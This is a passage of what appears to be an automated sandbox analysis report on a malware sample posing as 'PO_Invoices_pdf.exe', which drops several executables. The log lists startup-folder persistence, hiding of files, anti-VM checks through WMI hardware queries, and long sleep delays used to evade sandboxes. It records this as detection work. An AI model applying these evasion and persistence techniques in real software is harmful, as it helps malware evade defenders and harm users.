                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe\:Zone.Identifier:$DATA

                            Hooking and other Techniques for Hiding and Protection:

                            Changes the view of files in windows explorer (hidden files and folders)
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe; Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe; Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Process information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe; Process information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe; Process information set: NOGPFAULTERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe; Process information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM_3
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 5904, type: MEMORY
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | Function Chain: threadResumed,threadDelayed,systemQueried,memAlloc,threadCreated,threadResumed,threadDelayed,threadDelayed,threadDelayed,systemQueried,threadDelayed,threadDelayed,systemQueried,processQueried,processQueried,systemQueried,threadDelayed,threadDelayed,threadDelayed,threadAPCQueued,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Function Chain: threadDelayed,threadCreated,threadResumed,threadDelayed,threadDelayed,deviceIO,threadDelayed,threadDelayed,systemQueried,threadDelayed,threadDelayed,threadDelayed,threadDelayed,processSet,processSet,memAlloc,threadInformationSet,threadInformationSet,threadDelayed,systemQueried,threadDelayed,threadDelayed,threadDelayed,memAlloc,processSet
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | Function Chain: memAlloc,systemQueried,systemQueried,threadCreated,threadResumed,threadDelayed,threadDelayed,threadDelayed,systemQueried,systemQueried,systemQueried,threadDelayed,threadDelayed,threadAPCQueued,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,memAlloc,threadDelayed,memAlloc,memAlloc,memAlloc,memAlloc
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Thread delayed: delay time: 300000
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Thread delayed: delay time: 300000
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1357
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1251
Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe | Window / User API: threadDelayed 1099
Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe | Window / User API: threadDelayed 8718
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe | Window / User API: threadDelayed 1499
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe | Window / User API: threadDelayed 8293
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4134
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2549
Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe | Window / User API: threadDelayed 798
Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe | Window / User API: threadDelayed 9012
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe | Window / User API: threadDelayed 2778
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe | Window / User API: threadDelayed 6864
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe TID: 5908 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5836 | Thread sleep count: 1357 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5888 | Thread sleep count: 1251 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6284 | Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6216 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1516 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe TID: 6192 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe TID: 6644 | Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe TID: 6648 | Thread sleep time: -140000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe TID: 6668 | Thread sleep time: -300000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe TID: 7036 | Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe TID: 2148 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe TID: 2148 | Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe TID: 2148 | Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe TID: 7108 | Thread sleep time: -23058430092136925s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe TID: 7112 | Thread sleep count: 1099 > 30
Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe TID: 7112 | Thread sleep count: 8718 > 30
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804 | Thread sleep time: -24903104499507879s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804 | Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804 | Thread sleep time: -199750s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804 | Thread sleep time: -99766s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804 | Thread sleep time: -99656s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804 | Thread sleep time: -99531s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804 | Thread sleep time: -99422s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804 | Thread sleep time: -99313s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804 | Thread sleep time: -99156s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804 | Thread sleep time: -99047s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804 | Thread sleep time: -98938s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804 | Thread sleep time: -98828s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804 | Thread sleep time: -98719s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804 | Thread sleep time: -98610s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804 | Thread sleep time: -196906s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804 | Thread sleep time: -98344s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804 | Thread sleep time: -98234s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804 | Thread sleep time: -196250s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804 | Thread sleep time: -98016s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804 | Thread sleep time: -195812s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804 | Thread sleep time: -97797s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804 | Thread sleep time: -97688s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804 | Thread sleep time: -97563s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804 | Thread sleep time: -97453s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804 | Thread sleep time: -97344s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804 | Thread sleep time: -97203s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804 | Thread sleep time: -99765s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804 | Thread sleep time: -99546s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804 | Thread sleep time: -99437s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804 | Thread sleep time: -99328s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804 | Thread sleep time: -99218s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804 | Thread sleep time: -99109s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804 | Thread sleep time: -99000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804 | Thread sleep time: -98890s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804 | Thread sleep time: -98781s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804 | Thread sleep time: -98671s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804 | Thread sleep time: -98562s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804 | Thread sleep time: -98343s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804 | Thread sleep time: -98015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804 | Thread sleep time: -97796s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804 | Thread sleep time: -97687s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804 | Thread sleep time: -97578s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804 | Thread sleep time: -97468s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804 | Thread sleep time: -97359s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804 | Thread sleep time: -97250s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe TID: 6976 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe TID: 6976 | Thread sleep count: 109 > 30
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe TID: 6976 | Thread sleep time: -3270000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe TID: 6976 | Thread sleep time: -90000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe TID: 6232 | Thread sleep count: 224 > 30
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe TID: 6644 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5884 | Thread sleep count: 4134 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5884 | Thread sleep count: 2549 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6664 | Thread sleep count: 43 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6368 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6084 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe TID: 576 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe TID: 5168 | Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe TID: 5228 | Thread sleep time: -140000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe TID: 5268 | Thread sleep count: 60 > 30
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe TID: 5244 | Thread sleep time: -300000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe TID: 712 | Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe TID: 6812 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe TID: 6812 | Thread sleep time: -500000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe TID: 6812 | Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe TID: 4760 | Thread sleep time: -20291418481080494s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe TID: 4756 | Thread sleep count: 798 > 30
Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe TID: 4756 | Thread sleep count: 9012 > 30
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280 | Thread sleep time: -23980767295822402s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280 | Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5248 | Thread sleep count: 2778 > 30
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280 | Thread sleep time: -99703s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280 | Thread sleep time: -199188s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280 | Thread sleep time: -99453s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5248 | Thread sleep count: 6864 > 30
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280 | Thread sleep time: -99313s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280 | Thread sleep time: -99203s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280 | Thread sleep time: -99047s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280 | Thread sleep time: -98938s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280 | Thread sleep time: -98797s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280 | Thread sleep time: -98641s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280 | Thread sleep time: -98531s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280 | Thread sleep time: -98406s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280 | Thread sleep time: -98297s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280 | Thread sleep time: -196282s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280 | Thread sleep time: -196000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280 | Thread sleep time: -195782s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280 | Thread sleep time: -97750s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280 | Thread sleep time: -195282s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280 | Thread sleep time: -97500s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280 | Thread sleep time: -97391s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280 | Thread sleep time: -97281s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280 | Thread sleep time: -97172s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280 | Thread sleep time: -97063s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280 | Thread sleep time: -96953s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280 | Thread sleep time: -96844s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280 | Thread sleep time: -96735s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280 | Thread sleep time: -96594s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280 | Thread sleep time: -99844s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280 | Thread sleep time: -99735s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280 | Thread sleep time: -99344s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280 | Thread sleep time: -99188s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280 | Thread sleep time: -99078s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280 | Thread sleep time: -98969s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280 | Thread sleep time: -98860s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280 | Thread sleep time: -98735s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280 | Thread sleep time: -98547s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280 | Thread sleep time: -98391s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280 | Thread sleep time: -98250s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280 | Thread sleep time: -97531s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280 | Thread sleep time: -97422s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280 | Thread sleep time: -97313s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280 | Thread sleep time: -97203s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280 | Thread sleep time: -97094s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280 | Thread sleep time: -96985s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280 | Thread sleep time: -99875s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280 | Thread sleep time: -99750s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280 | Thread sleep time: -99625s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe TID: 5960 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe TID: 5960 | Thread sleep count: 112 > 30
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe TID: 5960 | Thread sleep time: -3360000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe TID: 5960 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe TID: 1352 | Thread sleep count: 340 > 30
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
